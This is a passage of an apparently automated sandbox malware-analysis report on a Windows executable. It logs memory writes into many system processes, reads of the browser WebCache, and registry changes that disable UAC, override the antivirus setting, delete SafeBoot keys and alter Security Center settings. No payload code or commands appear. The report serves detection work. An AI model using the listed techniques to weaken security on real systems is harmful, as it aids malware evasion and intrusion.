        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 610000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: C00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 240000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 710000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 4A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 980000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 8A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: DD70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 390000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 940000Jump to behavior
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: dwm.exe, 0000000E.00000000.1300226546.00000283DB78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
        Source: dwm.exe, 0000000E.00000000.1303615224.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000016.00000000.1421498975.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000017.00000000.1451176012.000001697AB91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 0000001B.00000002.3740758912.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1468114321.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004ACF60 GetLocalTime,GetSystemTime,GetTimeZoneInformation,6_2_004ACF60
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242F760 lstrcpy,GetUserNameA,lstrlen,lstrcat,lstrlen,lstrlen,RegOpenKeyExA,RegCreateKeyA,RegEnumValueA,RegDeleteValueA,wsprintfA,RegSetValueExA,wsprintfA,RegQueryValueExA,RegCloseKey,6_2_0242F760
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004B672C GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_004B672C
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004C6C59 GetVersion,RtlInitializeCriticalSection,6_2_004C6C59

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Changes security center settings (notifications, updates, antivirus, firewall)
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
        Deletes keys which are related to windows safe boot (disables safe mode boot)
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
        Disables UAC (registry)
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
        Disables user account control notifications
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
